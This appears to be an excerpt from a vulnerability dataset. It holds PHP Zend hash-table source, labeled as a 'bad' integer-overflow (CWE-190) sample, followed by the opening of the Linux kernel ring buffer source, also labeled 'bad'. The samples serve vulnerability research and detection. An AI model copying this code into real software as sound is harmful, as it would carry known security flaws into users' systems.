HT_HASH_RESET(target);
if (target->u.flags & HASH_FLAG_STATIC_KEYS) {
if (source->nNumUsed == source->nNumOfElements) {
idx = zend_array_dup_elements(source, target, 1, 0);
} else {
idx = zend_array_dup_elements(source, target, 1, 1);
}
} else {
if (source->nNumUsed == source->nNumOfElements) {
idx = zend_array_dup_elements(source, target, 0, 0);
} else {
idx = zend_array_dup_elements(source, target, 0, 1);
}
}
target->nNumUsed = idx;
target->nNumOfElements = idx;
if (idx > 0 && target->nInternalPointer == HT_INVALID_IDX) {
target->nInternalPointer = 0;
}
}
return target;
}
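/*
* zend_array_dup() picks one of three copy strategies: an empty source is
* reset to the lazily-allocated uninitialized_bucket state; an
* IS_ARRAY_IMMUTABLE source (interned/constant arrays) is duplicated with a
* single memcpy of the used region, since immutable arrays only hold values
* that need no refcounting; and ordinary packed or hashed tables are
* duplicated element by element, skipping UNDEF holes and re-linking the
* collision chains in the copy.
*/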
ZEND_API void ZEND_FASTCALL _zend_hash_merge(HashTable *target, HashTable *source, copy_ctor_func_t pCopyConstructor, zend_bool overwrite ZEND_FILE_LINE_DC)
{
uint32_t idx;
Bucket *p;
zval *t;
IS_CONSISTENT(source);
IS_CONSISTENT(target);
HT_ASSERT(GC_REFCOUNT(target) == 1);
if (overwrite) {
for (idx = 0; idx < source->nNumUsed; idx++) {
p = source->arData + idx;
if (UNEXPECTED(Z_TYPE(p->val) == IS_UNDEF)) continue;
if (UNEXPECTED(Z_TYPE(p->val) == IS_INDIRECT) &&
UNEXPECTED(Z_TYPE_P(Z_INDIRECT(p->val)) == IS_UNDEF)) {
continue;
}
if (p->key) {
t = _zend_hash_add_or_update_i(target, p->key, &p->val, HASH_UPDATE | HASH_UPDATE_INDIRECT ZEND_FILE_LINE_RELAY_CC);
if (t && pCopyConstructor) {
pCopyConstructor(t);
}
} else {
t = zend_hash_index_update(target, p->h, &p->val);
if (t && pCopyConstructor) {
pCopyConstructor(t);
}
}
}
} else {
for (idx = 0; idx < source->nNumUsed; idx++) {
p = source->arData + idx;
if (UNEXPECTED(Z_TYPE(p->val) == IS_UNDEF)) continue;
if (UNEXPECTED(Z_TYPE(p->val) == IS_INDIRECT) &&
UNEXPECTED(Z_TYPE_P(Z_INDIRECT(p->val)) == IS_UNDEF)) {
continue;
}
if (p->key) {
t = _zend_hash_add_or_update_i(target, p->key, &p->val, HASH_ADD | HASH_UPDATE_INDIRECT ZEND_FILE_LINE_RELAY_CC);
if (t && pCopyConstructor) {
pCopyConstructor(t);
}
} else {
t = zend_hash_index_add(target, p->h, &p->val);
if (t && pCopyConstructor) {
pCopyConstructor(t);
}
}
}
}
if (target->nNumOfElements > 0) {
idx = 0;
while (Z_TYPE(target->arData[idx].val) == IS_UNDEF) {
idx++;
}
target->nInternalPointer = idx;
}
}
static zend_bool ZEND_FASTCALL zend_hash_replace_checker_wrapper(HashTable *target, zval *source_data, Bucket *p, void *pParam, merge_checker_func_t merge_checker_func)
{
zend_hash_key hash_key;
hash_key.h = p->h;
hash_key.key = p->key;
return merge_checker_func(target, source_data, &hash_key, pParam);
}
ZEND_API void ZEND_FASTCALL zend_hash_merge_ex(HashTable *target, HashTable *source, copy_ctor_func_t pCopyConstructor, merge_checker_func_t pMergeSource, void *pParam)
{
uint32_t idx;
Bucket *p;
zval *t;
IS_CONSISTENT(source);
IS_CONSISTENT(target);
HT_ASSERT(GC_REFCOUNT(target) == 1);
for (idx = 0; idx < source->nNumUsed; idx++) {
p = source->arData + idx;
if (UNEXPECTED(Z_TYPE(p->val) == IS_UNDEF)) continue;
if (zend_hash_replace_checker_wrapper(target, &p->val, p, pParam, pMergeSource)) {
t = zend_hash_update(target, p->key, &p->val);
if (t && pCopyConstructor) {
pCopyConstructor(t);
}
}
}
if (target->nNumOfElements > 0) {
idx = 0;
while (Z_TYPE(target->arData[idx].val) == IS_UNDEF) {
idx++;
}
target->nInternalPointer = idx;
}
}
/* Returns the hash table data if found and NULL if not. */
ZEND_API zval* ZEND_FASTCALL zend_hash_find(const HashTable *ht, zend_string *key)
{
Bucket *p;
IS_CONSISTENT(ht);
p = zend_hash_find_bucket(ht, key);
return p ? &p->val : NULL;
}
ZEND_API zval* ZEND_FASTCALL zend_hash_str_find(const HashTable *ht, const char *str, size_t len)
{
zend_ulong h;
Bucket *p;
IS_CONSISTENT(ht);
h = zend_inline_hash_func(str, len);
p = zend_hash_str_find_bucket(ht, str, len, h);
return p ? &p->val : NULL;
}
ZEND_API zend_bool ZEND_FASTCALL zend_hash_exists(const HashTable *ht, zend_string *key)
{
Bucket *p;
IS_CONSISTENT(ht);
p = zend_hash_find_bucket(ht, key);
return p ? 1 : 0;
}
ZEND_API zend_bool ZEND_FASTCALL zend_hash_str_exists(const HashTable *ht, const char *str, size_t len)
{
zend_ulong h;
Bucket *p;
IS_CONSISTENT(ht);
h = zend_inline_hash_func(str, len);
p = zend_hash_str_find_bucket(ht, str, len, h);
return p ? 1 : 0;
}
ZEND_API zval* ZEND_FASTCALL zend_hash_index_find(const HashTable *ht, zend_ulong h)
{
Bucket *p;
IS_CONSISTENT(ht);
if (ht->u.flags & HASH_FLAG_PACKED) {
if (h < ht->nNumUsed) {
p = ht->arData + h;
if (Z_TYPE(p->val) != IS_UNDEF) {
return &p->val;
}
}
return NULL;
}
p = zend_hash_index_find_bucket(ht, h);
return p ? &p->val : NULL;
}
ZEND_API zend_bool ZEND_FASTCALL zend_hash_index_exists(const HashTable *ht, zend_ulong h)
{
Bucket *p;
IS_CONSISTENT(ht);
if (ht->u.flags & HASH_FLAG_PACKED) {
if (h < ht->nNumUsed) {
if (Z_TYPE(ht->arData[h].val) != IS_UNDEF) {
return 1;
}
}
return 0;
}
p = zend_hash_index_find_bucket(ht, h);
return p ? 1 : 0;
}
ZEND_API void ZEND_FASTCALL zend_hash_internal_pointer_reset_ex(HashTable *ht, HashPosition *pos)
{
uint32_t idx;
IS_CONSISTENT(ht);
HT_ASSERT(&ht->nInternalPointer != pos || GC_REFCOUNT(ht) == 1);
for (idx = 0; idx < ht->nNumUsed; idx++) {
if (Z_TYPE(ht->arData[idx].val) != IS_UNDEF) {
*pos = idx;
return;
}
}
*pos = HT_INVALID_IDX;
}
/* This function could be considerably optimized by remembering
* the end of the list
*/
ZEND_API void ZEND_FASTCALL zend_hash_internal_pointer_end_ex(HashTable *ht, HashPosition *pos)
{
uint32_t idx;
IS_CONSISTENT(ht);
HT_ASSERT(&ht->nInternalPointer != pos || GC_REFCOUNT(ht) == 1);
idx = ht->nNumUsed;
while (idx > 0) {
idx--;
if (Z_TYPE(ht->arData[idx].val) != IS_UNDEF) {
*pos = idx;
return;
}
}
*pos = HT_INVALID_IDX;
}
ZEND_API int ZEND_FASTCALL zend_hash_move_forward_ex(HashTable *ht, HashPosition *pos)
{
uint32_t idx = *pos;
IS_CONSISTENT(ht);
HT_ASSERT(&ht->nInternalPointer != pos || GC_REFCOUNT(ht) == 1);
if (idx != HT_INVALID_IDX) {
while (1) {
idx++;
if (idx >= ht->nNumUsed) {
*pos = HT_INVALID_IDX;
return SUCCESS;
}
if (Z_TYPE(ht->arData[idx].val) != IS_UNDEF) {
*pos = idx;
return SUCCESS;
}
}
} else {
return FAILURE;
}
}
ZEND_API int ZEND_FASTCALL zend_hash_move_backwards_ex(HashTable *ht, HashPosition *pos)
{
uint32_t idx = *pos;
IS_CONSISTENT(ht);
HT_ASSERT(&ht->nInternalPointer != pos || GC_REFCOUNT(ht) == 1);
if (idx != HT_INVALID_IDX) {
while (idx > 0) {
idx--;
if (Z_TYPE(ht->arData[idx].val) != IS_UNDEF) {
*pos = idx;
return SUCCESS;
}
}
*pos = HT_INVALID_IDX;
return SUCCESS;
} else {
return FAILURE;
}
}
/* This function should be made binary safe */
ZEND_API int ZEND_FASTCALL zend_hash_get_current_key_ex(const HashTable *ht, zend_string **str_index, zend_ulong *num_index, HashPosition *pos)
{
uint32_t idx = *pos;
Bucket *p;
IS_CONSISTENT(ht);
if (idx != HT_INVALID_IDX) {
p = ht->arData + idx;
if (p->key) {
*str_index = p->key;
return HASH_KEY_IS_STRING;
} else {
*num_index = p->h;
return HASH_KEY_IS_LONG;
}
}
return HASH_KEY_NON_EXISTENT;
}
ZEND_API void ZEND_FASTCALL zend_hash_get_current_key_zval_ex(const HashTable *ht, zval *key, HashPosition *pos)
{
uint32_t idx = *pos;
Bucket *p;
IS_CONSISTENT(ht);
if (idx == HT_INVALID_IDX) {
ZVAL_NULL(key);
} else {
p = ht->arData + idx;
if (p->key) {
ZVAL_STR_COPY(key, p->key);
} else {
ZVAL_LONG(key, p->h);
}
}
}
ZEND_API int ZEND_FASTCALL zend_hash_get_current_key_type_ex(HashTable *ht, HashPosition *pos)
{
uint32_t idx = *pos;
Bucket *p;
IS_CONSISTENT(ht);
if (idx != HT_INVALID_IDX) {
p = ht->arData + idx;
if (p->key) {
return HASH_KEY_IS_STRING;
} else {
return HASH_KEY_IS_LONG;
}
}
return HASH_KEY_NON_EXISTENT;
}
ZEND_API zval* ZEND_FASTCALL zend_hash_get_current_data_ex(HashTable *ht, HashPosition *pos)
{
uint32_t idx = *pos;
Bucket *p;
IS_CONSISTENT(ht);
if (idx != HT_INVALID_IDX) {
p = ht->arData + idx;
return &p->val;
} else {
return NULL;
}
}
ZEND_API void zend_hash_bucket_swap(Bucket *p, Bucket *q)
{
zval val;
zend_ulong h;
zend_string *key;
ZVAL_COPY_VALUE(&val, &p->val);
h = p->h;
key = p->key;
ZVAL_COPY_VALUE(&p->val, &q->val);
p->h = q->h;
p->key = q->key;
ZVAL_COPY_VALUE(&q->val, &val);
q->h = h;
q->key = key;
}
ZEND_API void zend_hash_bucket_renum_swap(Bucket *p, Bucket *q)
{
zval val;
ZVAL_COPY_VALUE(&val, &p->val);
ZVAL_COPY_VALUE(&p->val, &q->val);
ZVAL_COPY_VALUE(&q->val, &val);
}
ZEND_API void zend_hash_bucket_packed_swap(Bucket *p, Bucket *q)
{
zval val;
zend_ulong h;
ZVAL_COPY_VALUE(&val, &p->val);
h = p->h;
ZVAL_COPY_VALUE(&p->val, &q->val);
p->h = q->h;
ZVAL_COPY_VALUE(&q->val, &val);
q->h = h;
}
ZEND_API int ZEND_FASTCALL zend_hash_sort_ex(HashTable *ht, sort_func_t sort, compare_func_t compar, zend_bool renumber)
{
Bucket *p;
uint32_t i, j;
IS_CONSISTENT(ht);
HT_ASSERT(GC_REFCOUNT(ht) == 1);
if (!(ht->nNumOfElements>1) && !(renumber && ht->nNumOfElements>0)) { /* Doesn't require sorting */
return SUCCESS;
}
if (ht->nNumUsed == ht->nNumOfElements) {
i = ht->nNumUsed;
} else {
for (j = 0, i = 0; j < ht->nNumUsed; j++) {
p = ht->arData + j;
if (UNEXPECTED(Z_TYPE(p->val) == IS_UNDEF)) continue;
if (i != j) {
ht->arData[i] = *p;
}
i++;
}
}
sort((void *)ht->arData, i, sizeof(Bucket), compar,
(swap_func_t)(renumber? zend_hash_bucket_renum_swap :
((ht->u.flags & HASH_FLAG_PACKED) ? zend_hash_bucket_packed_swap : zend_hash_bucket_swap)));
HANDLE_BLOCK_INTERRUPTIONS();
ht->nNumUsed = i;
ht->nInternalPointer = 0;
if (renumber) {
for (j = 0; j < i; j++) {
p = ht->arData + j;
p->h = j;
if (p->key) {
zend_string_release(p->key);
p->key = NULL;
}
}
ht->nNextFreeElement = i;
}
if (ht->u.flags & HASH_FLAG_PACKED) {
if (!renumber) {
zend_hash_packed_to_hash(ht);
}
} else {
if (renumber) {
void *new_data, *old_data = HT_GET_DATA_ADDR(ht);
Bucket *old_buckets = ht->arData;
new_data = pemalloc(HT_SIZE_EX(ht->nTableSize, HT_MIN_MASK), (ht->u.flags & HASH_FLAG_PERSISTENT));
ht->u.flags |= HASH_FLAG_PACKED | HASH_FLAG_STATIC_KEYS;
ht->nTableMask = HT_MIN_MASK;
HT_SET_DATA_ADDR(ht, new_data);
memcpy(ht->arData, old_buckets, sizeof(Bucket) * ht->nNumUsed);
pefree(old_data, ht->u.flags & HASH_FLAG_PERSISTENT);
HT_HASH_RESET_PACKED(ht);
} else {
zend_hash_rehash(ht);
}
}
HANDLE_UNBLOCK_INTERRUPTIONS();
return SUCCESS;
}
static zend_always_inline int zend_hash_compare_impl(HashTable *ht1, HashTable *ht2, compare_func_t compar, zend_bool ordered) {
uint32_t idx1, idx2;
if (ht1->nNumOfElements != ht2->nNumOfElements) {
return ht1->nNumOfElements > ht2->nNumOfElements ? 1 : -1;
}
for (idx1 = 0, idx2 = 0; idx1 < ht1->nNumUsed; idx1++) {
Bucket *p1 = ht1->arData + idx1, *p2;
zval *pData1, *pData2;
int result;
if (Z_TYPE(p1->val) == IS_UNDEF) continue;
if (ordered) {
while (1) {
ZEND_ASSERT(idx2 != ht2->nNumUsed);
p2 = ht2->arData + idx2;
if (Z_TYPE(p2->val) != IS_UNDEF) break;
idx2++;
}
if (p1->key == NULL && p2->key == NULL) { /* numeric indices */
if (p1->h != p2->h) {
return p1->h > p2->h ? 1 : -1;
}
} else if (p1->key != NULL && p2->key != NULL) { /* string indices */
if (ZSTR_LEN(p1->key) != ZSTR_LEN(p2->key)) {
return ZSTR_LEN(p1->key) > ZSTR_LEN(p2->key) ? 1 : -1;
}
result = memcmp(ZSTR_VAL(p1->key), ZSTR_VAL(p2->key), ZSTR_LEN(p1->key));
if (result != 0) {
return result;
}
} else {
/* Mixed key types: A string key is considered as larger */
return p1->key != NULL ? 1 : -1;
}
pData2 = &p2->val;
idx2++;
} else {
if (p1->key == NULL) { /* numeric index */
pData2 = zend_hash_index_find(ht2, p1->h);
if (pData2 == NULL) {
return 1;
}
} else { /* string index */
pData2 = zend_hash_find(ht2, p1->key);
if (pData2 == NULL) {
return 1;
}
}
}
pData1 = &p1->val;
if (Z_TYPE_P(pData1) == IS_INDIRECT) {
pData1 = Z_INDIRECT_P(pData1);
}
if (Z_TYPE_P(pData2) == IS_INDIRECT) {
pData2 = Z_INDIRECT_P(pData2);
}
if (Z_TYPE_P(pData1) == IS_UNDEF) {
if (Z_TYPE_P(pData2) != IS_UNDEF) {
return -1;
}
} else if (Z_TYPE_P(pData2) == IS_UNDEF) {
return 1;
} else {
result = compar(pData1, pData2);
if (result != 0) {
return result;
}
}
}
return 0;
}
ZEND_API int zend_hash_compare(HashTable *ht1, HashTable *ht2, compare_func_t compar, zend_bool ordered)
{
int result;
IS_CONSISTENT(ht1);
IS_CONSISTENT(ht2);
HASH_PROTECT_RECURSION(ht1);
HASH_PROTECT_RECURSION(ht2);
result = zend_hash_compare_impl(ht1, ht2, compar, ordered);
HASH_UNPROTECT_RECURSION(ht1);
HASH_UNPROTECT_RECURSION(ht2);
return result;
}
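/*
 * Example (illustrative only; ht1, ht2 and the same_* variables are
 * hypothetical): with "compar" pointing at a zval comparison callback a
 * caller can test both notions of equality:
 *
 *	same_any_order = zend_hash_compare(ht1, ht2, compar, 0) == 0;
 *	same_in_order  = zend_hash_compare(ht1, ht2, compar, 1) == 0;
 *
 * For the tables ["a" => 1, "b" => 2] and ["b" => 2, "a" => 1] the first
 * call reports equality (each key of ht1 is looked up in ht2), while the
 * second does not: the buckets are walked in parallel and the very first
 * key pair ("a" vs "b") already differs in the memcmp() of the key strings.
 */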
ZEND_API zval* ZEND_FASTCALL zend_hash_minmax(const HashTable *ht, compare_func_t compar, uint32_t flag)
{
uint32_t idx;
Bucket *p, *res;
IS_CONSISTENT(ht);
if (ht->nNumOfElements == 0 ) {
return NULL;
}
idx = 0;
while (1) {
if (idx == ht->nNumUsed) {
return NULL;
}
if (Z_TYPE(ht->arData[idx].val) != IS_UNDEF) break;
idx++;
}
res = ht->arData + idx;
for (; idx < ht->nNumUsed; idx++) {
p = ht->arData + idx;
if (UNEXPECTED(Z_TYPE(p->val) == IS_UNDEF)) continue;
if (flag) {
if (compar(res, p) < 0) { /* max */
res = p;
}
} else {
if (compar(res, p) > 0) { /* min */
res = p;
}
}
}
return &res->val;
}
ZEND_API int ZEND_FASTCALL _zend_handle_numeric_str_ex(const char *key, size_t length, zend_ulong *idx)
{
register const char *tmp = key;
const char *end = key + length;
if (*tmp == '-') {
tmp++;
}
if ((*tmp == '0' && length > 1) /* numbers with leading zeros */
|| (end - tmp > MAX_LENGTH_OF_LONG - 1) /* number too long */
|| (SIZEOF_ZEND_LONG == 4 &&
end - tmp == MAX_LENGTH_OF_LONG - 1 &&
*tmp > '2')) { /* overflow */
return 0;
}
*idx = (*tmp - '0');
while (1) {
++tmp;
if (tmp == end) {
if (*key == '-') {
if (*idx-1 > ZEND_LONG_MAX) { /* overflow */
return 0;
}
*idx = 0 - *idx;
} else if (*idx > ZEND_LONG_MAX) { /* overflow */
return 0;
}
return 1;
}
if (*tmp <= '9' && *tmp >= '0') {
*idx = (*idx * 10) + (*tmp - '0');
} else {
return 0;
}
}
}
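/*
 * Worked examples for the parser above (illustrative):
 *
 *	"123"  -> *idx = 123, returns 1 (usable as a numeric index)
 *	"-7"   -> *idx = (zend_ulong)-7, returns 1
 *	"0123" -> returns 0 (leading zero, stays a string key)
 *	"12a"  -> returns 0 (non-digit character)
 *
 * Strings with more than MAX_LENGTH_OF_LONG - 1 digits, and values that
 * would not fit in a zend_long, are likewise rejected and kept as string
 * keys.
 */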
/*
* Local variables:
* tab-width: 4
* c-basic-offset: 4
* indent-tabs-mode: t
* End:
*/
| ./CrossVul/dataset_final_sorted/CWE-190/c/bad_3089_0 |
crossvul-cpp_data_bad_5498_0 | /*
* Generic ring buffer
*
* Copyright (C) 2008 Steven Rostedt <srostedt@redhat.com>
*/
#include <linux/trace_events.h>
#include <linux/ring_buffer.h>
#include <linux/trace_clock.h>
#include <linux/trace_seq.h>
#include <linux/spinlock.h>
#include <linux/irq_work.h>
#include <linux/uaccess.h>
#include <linux/hardirq.h>
#include <linux/kthread.h> /* for self test */
#include <linux/kmemcheck.h>
#include <linux/module.h>
#include <linux/percpu.h>
#include <linux/mutex.h>
#include <linux/delay.h>
#include <linux/slab.h>
#include <linux/init.h>
#include <linux/hash.h>
#include <linux/list.h>
#include <linux/cpu.h>
#include <asm/local.h>
static void update_pages_handler(struct work_struct *work);
/*
 * The ring buffer header is special. We must manually keep it up to date.
*/
int ring_buffer_print_entry_header(struct trace_seq *s)
{
trace_seq_puts(s, "# compressed entry header\n");
trace_seq_puts(s, "\ttype_len : 5 bits\n");
trace_seq_puts(s, "\ttime_delta : 27 bits\n");
trace_seq_puts(s, "\tarray : 32 bits\n");
trace_seq_putc(s, '\n');
trace_seq_printf(s, "\tpadding : type == %d\n",
RINGBUF_TYPE_PADDING);
trace_seq_printf(s, "\ttime_extend : type == %d\n",
RINGBUF_TYPE_TIME_EXTEND);
trace_seq_printf(s, "\tdata max type_len == %d\n",
RINGBUF_TYPE_DATA_TYPE_LEN_MAX);
return !trace_seq_has_overflowed(s);
}
/*
* The ring buffer is made up of a list of pages. A separate list of pages is
* allocated for each CPU. A writer may only write to a buffer that is
* associated with the CPU it is currently executing on. A reader may read
* from any per cpu buffer.
*
* The reader is special. For each per cpu buffer, the reader has its own
* reader page. When a reader has read the entire reader page, this reader
* page is swapped with another page in the ring buffer.
*
* Now, as long as the writer is off the reader page, the reader can do what
* ever it wants with that page. The writer will never write to that page
* again (as long as it is out of the ring buffer).
*
* Here's some silly ASCII art.
*
* +------+
* |reader| RING BUFFER
* |page |
* +------+ +---+ +---+ +---+
* | |-->| |-->| |
* +---+ +---+ +---+
* ^ |
* | |
* +---------------+
*
*
* +------+
* |reader| RING BUFFER
* |page |------------------v
* +------+ +---+ +---+ +---+
* | |-->| |-->| |
* +---+ +---+ +---+
* ^ |
* | |
* +---------------+
*
*
* +------+
* |reader| RING BUFFER
* |page |------------------v
* +------+ +---+ +---+ +---+
* ^ | |-->| |-->| |
* | +---+ +---+ +---+
* | |
* | |
* +------------------------------+
*
*
* +------+
* |buffer| RING BUFFER
* |page |------------------v
* +------+ +---+ +---+ +---+
* ^ | | | |-->| |
* | New +---+ +---+ +---+
* | Reader------^ |
* | page |
* +------------------------------+
*
*
* After we make this swap, the reader can hand this page off to the splice
* code and be done with it. It can even allocate a new page if it needs to
* and swap that into the ring buffer.
*
* We will be using cmpxchg soon to make all this lockless.
*
*/
/* Used for individual buffers (after the counter) */
#define RB_BUFFER_OFF (1 << 20)
#define BUF_PAGE_HDR_SIZE offsetof(struct buffer_data_page, data)
#define RB_EVNT_HDR_SIZE (offsetof(struct ring_buffer_event, array))
#define RB_ALIGNMENT 4U
#define RB_MAX_SMALL_DATA (RB_ALIGNMENT * RINGBUF_TYPE_DATA_TYPE_LEN_MAX)
#define RB_EVNT_MIN_SIZE 8U /* two 32bit words */
#ifndef CONFIG_HAVE_64BIT_ALIGNED_ACCESS
# define RB_FORCE_8BYTE_ALIGNMENT 0
# define RB_ARCH_ALIGNMENT RB_ALIGNMENT
#else
# define RB_FORCE_8BYTE_ALIGNMENT 1
# define RB_ARCH_ALIGNMENT 8U
#endif
#define RB_ALIGN_DATA __aligned(RB_ARCH_ALIGNMENT)
/* define RINGBUF_TYPE_DATA for 'case RINGBUF_TYPE_DATA:' */
#define RINGBUF_TYPE_DATA 0 ... RINGBUF_TYPE_DATA_TYPE_LEN_MAX
enum {
RB_LEN_TIME_EXTEND = 8,
RB_LEN_TIME_STAMP = 16,
};
#define skip_time_extend(event) \
((struct ring_buffer_event *)((char *)event + RB_LEN_TIME_EXTEND))
static inline int rb_null_event(struct ring_buffer_event *event)
{
return event->type_len == RINGBUF_TYPE_PADDING && !event->time_delta;
}
static void rb_event_set_padding(struct ring_buffer_event *event)
{
/* padding has a NULL time_delta */
event->type_len = RINGBUF_TYPE_PADDING;
event->time_delta = 0;
}
static unsigned
rb_event_data_length(struct ring_buffer_event *event)
{
unsigned length;
if (event->type_len)
length = event->type_len * RB_ALIGNMENT;
else
length = event->array[0];
return length + RB_EVNT_HDR_SIZE;
}
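/*
 * Example of the encoding handled above (illustrative): a data event with
 * a 12-byte payload is stored with type_len == 3 (3 * RB_ALIGNMENT bytes),
 * so rb_event_data_length() returns 12 + RB_EVNT_HDR_SIZE. A payload too
 * large for the 5-bit type_len field (more than RB_MAX_SMALL_DATA bytes)
 * is stored with type_len == 0, its length in array[0] and the data
 * starting at array[1] (see rb_event_data() below).
 */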
/*
* Return the length of the given event. Will return
* the length of the time extend if the event is a
* time extend.
*/
static inline unsigned
rb_event_length(struct ring_buffer_event *event)
{
switch (event->type_len) {
case RINGBUF_TYPE_PADDING:
if (rb_null_event(event))
/* undefined */
return -1;
return event->array[0] + RB_EVNT_HDR_SIZE;
case RINGBUF_TYPE_TIME_EXTEND:
return RB_LEN_TIME_EXTEND;
case RINGBUF_TYPE_TIME_STAMP:
return RB_LEN_TIME_STAMP;
case RINGBUF_TYPE_DATA:
return rb_event_data_length(event);
default:
BUG();
}
/* not hit */
return 0;
}
/*
* Return total length of time extend and data,
* or just the event length for all other events.
*/
static inline unsigned
rb_event_ts_length(struct ring_buffer_event *event)
{
unsigned len = 0;
if (event->type_len == RINGBUF_TYPE_TIME_EXTEND) {
/* time extends include the data event after it */
len = RB_LEN_TIME_EXTEND;
event = skip_time_extend(event);
}
return len + rb_event_length(event);
}
/**
* ring_buffer_event_length - return the length of the event
* @event: the event to get the length of
*
* Returns the size of the data load of a data event.
* If the event is something other than a data event, it
* returns the size of the event itself. With the exception
* of a TIME EXTEND, where it still returns the size of the
* data load of the data event after it.
*/
unsigned ring_buffer_event_length(struct ring_buffer_event *event)
{
unsigned length;
if (event->type_len == RINGBUF_TYPE_TIME_EXTEND)
event = skip_time_extend(event);
length = rb_event_length(event);
if (event->type_len > RINGBUF_TYPE_DATA_TYPE_LEN_MAX)
return length;
length -= RB_EVNT_HDR_SIZE;
if (length > RB_MAX_SMALL_DATA + sizeof(event->array[0]))
length -= sizeof(event->array[0]);
return length;
}
EXPORT_SYMBOL_GPL(ring_buffer_event_length);
/* inline for ring buffer fast paths */
static void *
rb_event_data(struct ring_buffer_event *event)
{
if (event->type_len == RINGBUF_TYPE_TIME_EXTEND)
event = skip_time_extend(event);
BUG_ON(event->type_len > RINGBUF_TYPE_DATA_TYPE_LEN_MAX);
/* If length is in len field, then array[0] has the data */
if (event->type_len)
return (void *)&event->array[0];
/* Otherwise length is in array[0] and array[1] has the data */
return (void *)&event->array[1];
}
/**
* ring_buffer_event_data - return the data of the event
* @event: the event to get the data from
*/
void *ring_buffer_event_data(struct ring_buffer_event *event)
{
return rb_event_data(event);
}
EXPORT_SYMBOL_GPL(ring_buffer_event_data);
#define for_each_buffer_cpu(buffer, cpu) \
for_each_cpu(cpu, buffer->cpumask)
#define TS_SHIFT 27
#define TS_MASK ((1ULL << TS_SHIFT) - 1)
#define TS_DELTA_TEST (~TS_MASK)
/* Flag when events were overwritten */
#define RB_MISSED_EVENTS (1 << 31)
/* Missed count stored at end */
#define RB_MISSED_STORED (1 << 30)
struct buffer_data_page {
u64 time_stamp; /* page time stamp */
local_t commit; /* write committed index */
unsigned char data[] RB_ALIGN_DATA; /* data of buffer page */
};
/*
* Note, the buffer_page list must be first. The buffer pages
* are allocated in cache lines, which means that each buffer
* page will be at the beginning of a cache line, and thus
* the least significant bits will be zero. We use this to
* add flags in the list struct pointers, to make the ring buffer
* lockless.
*/
struct buffer_page {
struct list_head list; /* list of buffer pages */
local_t write; /* index for next write */
unsigned read; /* index for next read */
local_t entries; /* entries on this page */
unsigned long real_end; /* real end of data */
struct buffer_data_page *page; /* Actual data page */
};
/*
* The buffer page counters, write and entries, must be reset
* atomically when crossing page boundaries. To synchronize this
* update, two counters are inserted into the number. One is
* the actual counter for the write position or count on the page.
*
* The other is a counter of updaters. Before an update happens
* the update partition of the counter is incremented. This will
* allow the updater to update the counter atomically.
*
* The counter is 20 bits, and the state data is 12.
*/
#define RB_WRITE_MASK 0xfffff
#define RB_WRITE_INTCNT (1 << 20)
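/*
 * Worked example (illustrative): with RB_WRITE_MASK == 0xfffff the low
 * 20 bits of bpage->write hold the byte index on the page, while the bits
 * from RB_WRITE_INTCNT upward count nested updaters.
 * local_add_return(RB_WRITE_INTCNT, &bpage->write) therefore bumps only
 * the updater part, and "local_read(&bpage->write) & RB_WRITE_MASK"
 * recovers the real write position (see rb_page_write() further down).
 */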
static void rb_init_page(struct buffer_data_page *bpage)
{
local_set(&bpage->commit, 0);
}
/**
* ring_buffer_page_len - the size of data on the page.
* @page: The page to read
*
* Returns the amount of data on the page, including buffer page header.
*/
size_t ring_buffer_page_len(void *page)
{
return local_read(&((struct buffer_data_page *)page)->commit)
+ BUF_PAGE_HDR_SIZE;
}
/*
* Also stolen from mm/slob.c. Thanks to Mathieu Desnoyers for pointing
* this issue out.
*/
static void free_buffer_page(struct buffer_page *bpage)
{
free_page((unsigned long)bpage->page);
kfree(bpage);
}
/*
* We need to fit the time_stamp delta into 27 bits.
*/
static inline int test_time_stamp(u64 delta)
{
if (delta & TS_DELTA_TEST)
return 1;
return 0;
}
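/*
 * Example (illustrative): a delta of up to TS_MASK (2^27 - 1) clock units
 * fits in an event's 27-bit time_delta field and test_time_stamp() returns
 * 0. For anything larger it returns 1, and the writer prepends a
 * RINGBUF_TYPE_TIME_EXTEND event whose time_delta carries the low 27 bits
 * and whose array[0] carries the remaining high bits (see
 * rb_add_time_stamp() further down).
 */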
#define BUF_PAGE_SIZE (PAGE_SIZE - BUF_PAGE_HDR_SIZE)
/* Max payload is BUF_PAGE_SIZE - header (8bytes) */
#define BUF_MAX_DATA_SIZE (BUF_PAGE_SIZE - (sizeof(u32) * 2))
int ring_buffer_print_page_header(struct trace_seq *s)
{
struct buffer_data_page field;
trace_seq_printf(s, "\tfield: u64 timestamp;\t"
"offset:0;\tsize:%u;\tsigned:%u;\n",
(unsigned int)sizeof(field.time_stamp),
(unsigned int)is_signed_type(u64));
trace_seq_printf(s, "\tfield: local_t commit;\t"
"offset:%u;\tsize:%u;\tsigned:%u;\n",
(unsigned int)offsetof(typeof(field), commit),
(unsigned int)sizeof(field.commit),
(unsigned int)is_signed_type(long));
trace_seq_printf(s, "\tfield: int overwrite;\t"
"offset:%u;\tsize:%u;\tsigned:%u;\n",
(unsigned int)offsetof(typeof(field), commit),
1,
(unsigned int)is_signed_type(long));
trace_seq_printf(s, "\tfield: char data;\t"
"offset:%u;\tsize:%u;\tsigned:%u;\n",
(unsigned int)offsetof(typeof(field), data),
(unsigned int)BUF_PAGE_SIZE,
(unsigned int)is_signed_type(char));
return !trace_seq_has_overflowed(s);
}
struct rb_irq_work {
struct irq_work work;
wait_queue_head_t waiters;
wait_queue_head_t full_waiters;
bool waiters_pending;
bool full_waiters_pending;
bool wakeup_full;
};
/*
* Structure to hold event state and handle nested events.
*/
struct rb_event_info {
u64 ts;
u64 delta;
unsigned long length;
struct buffer_page *tail_page;
int add_timestamp;
};
/*
* Used for which event context the event is in.
* NMI = 0
* IRQ = 1
* SOFTIRQ = 2
* NORMAL = 3
*
* See trace_recursive_lock() comment below for more details.
*/
enum {
RB_CTX_NMI,
RB_CTX_IRQ,
RB_CTX_SOFTIRQ,
RB_CTX_NORMAL,
RB_CTX_MAX
};
/*
* head_page == tail_page && head == tail then buffer is empty.
*/
struct ring_buffer_per_cpu {
int cpu;
atomic_t record_disabled;
struct ring_buffer *buffer;
raw_spinlock_t reader_lock; /* serialize readers */
arch_spinlock_t lock;
struct lock_class_key lock_key;
unsigned long nr_pages;
unsigned int current_context;
struct list_head *pages;
struct buffer_page *head_page; /* read from head */
struct buffer_page *tail_page; /* write to tail */
struct buffer_page *commit_page; /* committed pages */
struct buffer_page *reader_page;
unsigned long lost_events;
unsigned long last_overrun;
local_t entries_bytes;
local_t entries;
local_t overrun;
local_t commit_overrun;
local_t dropped_events;
local_t committing;
local_t commits;
unsigned long read;
